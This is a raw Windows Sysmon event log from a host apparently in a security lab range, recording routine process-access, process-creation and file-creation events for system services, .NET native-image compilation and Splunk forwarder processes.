13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9238-6005-2204-00000000A301}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9238-6005-2204-00000000A301}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.603{59A5CD1D-9238-6005-2204-00000000A301}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.320{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9238-6005-2104-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.305{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9238-6005-2104-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.305{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9238-6005-2104-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9238-6005-2004-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.133{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9238-6005-2004-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.133{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9238-6005-2004-00000000A301}2824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.117{59A5CD1D-9237-6005-1F04-00000000A301}3180920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000008401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:48.024{59A5CD1D-9236-6005-1D04-00000000A301}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1210-0\System.Data.Linq.dll2021-01-18 13:50:48.024 10341000x80000000000000008429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:49.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9239-6005-2404-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:49.336{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9239-6005-2404-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:49.336{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9239-6005-2404-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.727{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923A-6005-2704-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.711{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-923A-6005-2704-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:50.711{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923A-6005-2704-00000000A301}3416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 